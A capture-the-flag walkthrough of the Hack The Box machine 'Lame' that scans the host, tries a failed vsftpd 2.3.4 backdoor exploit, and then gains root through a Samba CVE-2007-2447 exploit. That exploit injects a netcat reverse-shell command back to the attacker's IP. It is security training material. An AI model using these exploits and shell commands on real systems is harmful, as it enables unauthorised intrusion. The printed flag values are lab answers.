Run a quick nmap scan
└─$ nmap -sV -v 10.129.5.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 02:06 EDT
NSE: Loaded 46 scripts for scanning.
Initiating Ping Scan at 02:06
Scanning 10.129.5.9 [4 ports]
Completed Ping Scan at 02:06, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 02:06
Completed Parallel DNS resolution of 1 host. at 02:06, 0.00s elapsed
Initiating SYN Stealth Scan at 02:06
Scanning 10.129.5.9 [1000 ports]
Discovered open port 21/tcp on 10.129.5.9
Discovered open port 22/tcp on 10.129.5.9
Discovered open port 445/tcp on 10.129.5.9
Discovered open port 139/tcp on 10.129.5.9
Completed SYN Stealth Scan at 02:07, 7.83s elapsed (1000 total ports)
Initiating Service scan at 02:07
Scanning 4 services on 10.129.5.9
Completed Service scan at 02:07, 11.42s elapsed (4 services on 1 host)
NSE: Script scanning 10.129.5.9.
Initiating NSE at 02:07
Completed NSE at 02:07, 0.01s elapsed
Initiating NSE at 02:07
Completed NSE at 02:07, 0.01s elapsed
Nmap scan report for 10.129.5.9
Host is up (0.12s latency).
Not shown: 996 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.3.4
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.83 seconds
Raw packets sent: 2005 (88.196KB) | Rcvd: 10 (424B)
How many of the nmap
top 1000 TCP ports are open on the remote host? 4
What version of VSFTPd is running on Lame? 2.3.4
There is a famous backdoor in VSFTPd version 2.3.4, and a Metasploit module to exploit it. Does that exploit work here? no
https://www.exploit-db.com/exploits/49757
https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
┌──(kali㉿kali)-[~/Lame]
└─$ searchsploit -m 49757
Exploit: vsftpd 2.3.4 - Backdoor Command Execution
URL: https://www.exploit-db.com/exploits/49757
Path: /usr/share/exploitdb/exploits/unix/remote/49757.py
Codes: CVE-2011-2523
Verified: True
File Type: Python script, ASCII text executable
Copied to: /home/kali/Lame/49757.py
┌──(kali㉿kali)-[~/Lame]
└─$ python3 49757.py 10.129.5.9
/home/kali/Lame/49757.py:11: DeprecationWarning: 'telnetlib' is deprecated and slated for removal in Python 3.13
from telnetlib import Telnet
^C [+]Exiting...
┌──(kali㉿kali)-[~/Lame]
└─$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
asics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.129.5.9
rhosts => 10.129.5.9
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.129.5.9:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.5.9:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) >
What version of Samba is running on Lame? Give the numbers up to but not including "-Debian". 3.0.20
To enumerate Samba version, let’s run nmap scan with specific flags
$ nmap --script=smb-os-discovery,smb-vuln* -p 139,445 10.129.5.9
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-12 02:15 EDT
Nmap scan report for 10.129.5.9
Host is up (0.12s latency).
PORT STATE SERVICE
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Host script results:
|_smb-vuln-ms10-061: false
|_smb-vuln-regsvc-dos: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-054: false
| smb-os-discovery:
| OS: Unix (Samba 3.0.20-Debian)
| Computer name: lame
| NetBIOS computer name:
| Domain name: hackthebox.gr
| FQDN: lame.hackthebox.gr
|_ System time: 2024-10-12T02:16:01-04:00
Nmap done: 1 IP address (1 host up) scanned in 102.13 seconds
We will try listing SMB shares using anonymous login - it worked.
┌──(kali㉿kali)-[~/Tools]
└─$ smbclient -L //10.129.5.9
Password for [WORKGROUP\kali]:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
tmp Disk oh noes!
opt Disk
IPC$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
ADMIN$ IPC IPC Service (lame server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP LAME
What 2007 CVE allows for remote code execution in this version of Samba via shell metacharacters involving the SamrChangePassword
function when the "username map script" option is enabled in smb.conf
? CVE-2007-2447
We will use the exploit https://github.com/Ziemni/CVE-2007-2447-in-Python
└─$ git clone https://github.com/Ziemni/CVE-2007-2447-in-Python.git
Cloning into 'CVE-2007-2447-in-Python'...
remote: Enumerating objects: 10, done.
remote: Counting objects: 100% (10/10), done.
remote: Compressing objects: 100% (10/10), done.
remote: Total 10 (delta 2), reused 3 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (10/10), done.
Resolving deltas: 100% (2/2), done.
└─$ python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
pysmb is not installed: python3 -m pip install pysmb
You can create a Python virtual environment to install pysmb
without modifying the system Python installation.
Solution 1: Use a Python Virtual Environment
You can create a Python virtual environment to install pysmb
without modifying the system Python installation.
- Create a virtual environment:
- Activate the virtual environment:
- Install
pysmb
within the virtual environment: - Run your script:
Now that the environment is set up, run your
smbExploit.py
script:
python3 -m venv ~/venv/pysmb-env
source ~/venv/pysmb-env/bin/activate
pip install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
To exit the virtual environment later, you can simply type:
deactivate
Solution 2: Use pipx
to Install pysmb
pipx
allows you to install Python packages in isolated environments and run them easily.
- Install
pipx
: - Install
pysmb
usingpipx
: - Run your script:
Since
pipx
manages the dependencies, you should be able to runsmbExploit.py
without issues:
sudo apt install pipx
pipx install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We will stick with first solution (remember to set up a listener on port 443)
python3 -m venv ~/venv/pysmb-env
source ~/venv/pysmb-env/bin/activate
pip install pysmb
python3 smbExploit.py 10.129.5.9 139 'nc -e /bin/sh 10.10.14.8 443'
We caught the reverse shell
└─$ rlwrap nc -nvlp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.129.5.9] 57893
whoami
root
cd /home/makis
cat user.txt
1ee8420c424dbee0d41b73c575041cdf
ifconfig
eth0 Link encap:Ethernet HWaddr 00:50:56:b9:90:85
inet addr:10.129.5.9 Bcast:10.129.255.255 Mask:255.255.0.0
inet6 addr: dead:beef::250:56ff:feb9:9085/64 Scope:Global
inet6 addr: fe80::250:56ff:feb9:9085/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:6021 errors:0 dropped:0 overruns:0 frame:0
TX packets:797 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:440800 (430.4 KB) TX bytes:103810 (101.3 KB)
Interrupt:19 Base address:0x2024
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:357 errors:0 dropped:0 overruns:0 frame:0
TX packets:357 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:150821 (147.2 KB) TX bytes:150821 (147.2 KB)
pwd
/home/makis
cd /root
cat root.txt
6a749bea1faf2ef8c910c0b18cec21be
We'll explore a bit beyond just getting a root shell on the box. While the official writeup doesn't cover this, you can look at 0xdf's write-up for more details. With a root shell, we can look at why the VSFTPd exploit failed. Our initial nmap
scan showed four open TCP ports. Running netstat -tnlp
shows many more ports listening, including ones on 0.0.0.0 and the boxes external IP, so they should be accessible. What must be blocking connection to these ports? firewall
netstat -tnlp
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:512 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:513 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:2049 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:8009 0.0.0.0:* LISTEN 5648/jsvc
tcp 0 0 0.0.0.0:32905 0.0.0.0:* LISTEN 5689/rmiregistry
tcp 0 0 0.0.0.0:6697 0.0.0.0:* LISTEN 5700/unrealircd
tcp 0 0 0.0.0.0:3306 0.0.0.0:* LISTEN 5235/mysqld
tcp 0 0 0.0.0.0:1099 0.0.0.0:* LISTEN 5689/rmiregistry
tcp 0 0 0.0.0.0:6667 0.0.0.0:* LISTEN 5700/unrealircd
tcp 0 0 0.0.0.0:139 0.0.0.0:* LISTEN 5489/smbd
tcp 0 0 0.0.0.0:5900 0.0.0.0:* LISTEN 5712/Xtightvnc
tcp 0 0 0.0.0.0:43535 0.0.0.0:* LISTEN 5411/rpc.mountd
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN 4690/portmap
tcp 0 0 0.0.0.0:6000 0.0.0.0:* LISTEN 5712/Xtightvnc
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 5668/apache2
tcp 0 0 0.0.0.0:8787 0.0.0.0:* LISTEN 5693/ruby
tcp 0 0 0.0.0.0:8180 0.0.0.0:* LISTEN 5648/jsvc
tcp 0 0 0.0.0.0:1524 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:21 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 10.129.5.9:53 0.0.0.0:* LISTEN 5088/named
tcp 0 0 127.0.0.1:53 0.0.0.0:* LISTEN 5088/named
tcp 0 0 0.0.0.0:23 0.0.0.0:* LISTEN 5511/xinetd
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 5316/postgres
tcp 0 0 0.0.0.0:25 0.0.0.0:* LISTEN 5479/master
tcp 0 0 127.0.0.1:953 0.0.0.0:* LISTEN 5088/named
tcp 0 0 0.0.0.0:51132 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:445 0.0.0.0:* LISTEN 5489/smbd
tcp 0 0 0.0.0.0:51837 0.0.0.0:* LISTEN 4708/rpc.statd
tcp6 0 0 :::2121 :::* LISTEN 5586/proftpd: (acce
tcp6 0 0 :::3632 :::* LISTEN 5343/distccd
tcp6 0 0 :::53 :::* LISTEN 5088/named
tcp6 0 0 :::22 :::* LISTEN 5112/sshd
tcp6 0 0 :::5432 :::* LISTEN 5316/postgres
tcp6 0 0 ::1:953 :::* LISTEN 5088/named
When the VSFTPd backdoor is trigger, what port starts listening? 6200
If we look at the exploit closely from https://www.exploit-db.com/exploits/49757, the exploit shows that backdoor connects to port 6200
tn2=Telnet(host, 6200)
print('Success, shell opened')
print('Send `exit` to quit shell')
tn2.interact()
When the VSFTPd backdoor is triggered, does port 6200 start listening on Lame?
We will run the exploit and check. This time, we will use Metasploit.
└─$ msfconsole -q
msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
[*] No payload configured, defaulting to cmd/unix/interact
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > options
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
CHOST no The local client address
CPORT no The local client port
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/b
asics/using-metasploit.html
RPORT 21 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic
View the full module info with the info, or info -d command.
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set rhosts 10.129.5.9
rhosts => 10.129.5.9
msf6 exploit(unix/ftp/vsftpd_234_backdoor) > run
[*] 10.129.5.9:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.129.5.9:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
On the reverse shell, we have caught earlier, we will run ss -ntplu
The ss -ntplu
command is used to display information about network connections in Linux, including both TCP and UDP listening ports. Here's what each flag stands for:
n
: Show numerical addresses instead of resolving hostnames.t
: Display TCP sockets.p
: Show the processes using the sockets.l
: Show only listening sockets.u
: Display UDP sockets.
When you run this command, it will display a list of all the TCP and UDP listening sockets along with the associated processes.
ss -ntplu
Netid Recv-Q Send-Q Local Address:Port Peer Address:Port
tcp 0 64 *:512 *:* users:(("xinetd",5511,11))
tcp 0 64 *:513 *:* users:(("xinetd",5511,10))
tcp 0 64 *:2049 *:*
tcp 0 64 *:514 *:* users:(("xinetd",5511,9))
tcp 0 0 *:8009 *:* users:(("jsvc",5648,63))
tcp 0 50 *:32905 *:* users:(("rmiregistry",5689,8))
tcp 0 5 *:6697 *:* users:(("unrealircd",5700,3))
tcp 0 5 :::2121 :::* users:(("proftpd",5586,1))
tcp 0 50 *:3306 *:* users:(("mysqld",5235,10))
tcp 0 50 *:1099 *:* users:(("rmiregistry",5689,7))
tcp 0 5 *:6667 *:* users:(("unrealircd",5700,2))
tcp 0 50 *:139 *:* users:(("smbd",5489,22))
tcp 0 5 *:5900 *:* users:(("Xtightvnc",5712,3))
tcp 0 128 *:43535 *:* users:(("rpc.mountd",5411,7))
tcp 0 128 *:111 *:* users:(("portmap",4690,4))
tcp 0 128 *:6000 *:* users:(("Xtightvnc",5712,0))
tcp 0 128 *:80 *:* users:(("apache2",5668,3),("apache2",5669,3),("apache2",5672,3),("apache2",5675,3),("apache2",5677,3),("apache2",5679,3))
tcp 0 10 :::3632 :::* users:(("distccd",5343,4),("distccd",5344,4),("distccd",5555,4),("distccd",5556,4))
tcp 0 5 *:8787 *:* users:(("ruby",5693,3))
tcp 0 100 *:8180 *:* users:(("jsvc",5648,49))
tcp 0 64 *:1524 *:* users:(("xinetd",5511,12))
tcp 0 64 *:21 *:* users:(("xinetd",5511,5))
tcp 0 3 10.129.5.9:53 *:* users:(("named",5088,25))
tcp 0 3 127.0.0.1:53 *:* users:(("named",5088,23))
tcp 0 3 :::53 :::* users:(("named",5088,21))
tcp 0 128 :::22 :::* users:(("sshd",5112,3))
tcp 0 64 *:23 *:* users:(("xinetd",5511,6))
tcp 0 100 *:6200 *:* users:(("vsftpd",6040,5))
tcp 0 128 *:5432 *:* users:(("postgres",5316,6))
tcp 0 128 :::5432 :::* users:(("postgres",5316,3))
tcp 0 100 *:25 *:* users:(("master",5479,11))
tcp 0 128 ::1:953 :::* users:(("named",5088,29))
tcp 0 128 127.0.0.1:953 *:* users:(("named",5088,28))
tcp 0 64 *:51132 *:*
tcp 0 50 *:445 *:* users:(("smbd",5489,21))
tcp 0 128 *:51837 *:* users:(("rpc.statd",4708,8))
As highlighted, we can see that port 6200 starts listening on Lame.